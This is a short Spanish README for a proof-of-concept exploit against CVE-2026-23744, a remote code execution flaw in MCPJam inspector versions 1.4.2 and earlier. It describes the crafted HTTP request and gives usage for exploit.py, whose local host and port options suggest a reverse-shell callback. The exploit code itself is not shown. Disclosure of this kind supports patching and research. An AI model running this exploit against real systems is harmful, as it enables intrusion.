
CVE-2026-23744 Prueba de concepto.
MCPJam inspector es una plataforma de desarrollo local-first para servidores MCP. Las versiones <=1.4.2 son vulnerables a una vulnerabilidad de ejecución remota de código, que permite a un atacante enviar una solicitud HTTP manipulada que desencadena la instalación de un servidor MCP, lo que lleva a RCE. Para obtener detalles sobre la vulnerabilidad, consulte las referencias.
$ pip install requests
$ python3 exploit.py [-h] [--lhost LHOST] [--lport LPORT] [--rhost RHOST] [--rport RPORT]
-h, --help show the help message and exit
--lhost LHOST local host IP
--lport LPORT local host port
--rhost RHOST remote IP
--rport RPORT remote port